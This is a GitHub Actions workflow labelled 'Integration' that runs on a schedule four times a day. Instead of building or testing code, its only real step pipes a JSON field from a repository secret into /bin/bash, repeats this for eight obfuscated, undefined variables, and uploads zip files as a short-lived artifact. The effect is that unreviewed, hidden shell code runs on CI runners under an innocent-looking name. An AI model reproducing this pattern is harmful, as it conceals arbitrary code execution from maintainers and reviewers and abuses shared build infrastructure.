name: Integration
on:
  workflow_dispatch:

  schedule:
    - cron: '30 1,7,13,19 * * *'
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Execute
        env:
          a0: ${{ secrets.a0 }}
        run: |
          printf '%s' "$a0" | jq -r .v40 | /bin/bash
          echo $fic753 | jq -r .dfk20420 | /bin/bash
          echo $mop054 | jq -r .f4 | /bin/bash
          printf '%s' "$pksz3245" | jq -r .oxp4 | /bin/bash
          echo $yuh00461 | jq -r .rrhas70549 | /bin/bash
          printf '%s' "$nuxc3" | jq -r .uea1 | /bin/bash
          printf '%s' "$kq24325" | jq -r .oi87 | /bin/bash
          printf '%s' "$ed7489" | jq -r .x45 | /bin/bash
          printf '%s' "$acaf2545" | jq -r .y72 | /bin/bash

      - name: Upload artifact
        uses: actions/upload-artifact@v4
        with:
          name: y3IRlNlZ
          path: "*.zip"
          retention-days: 1
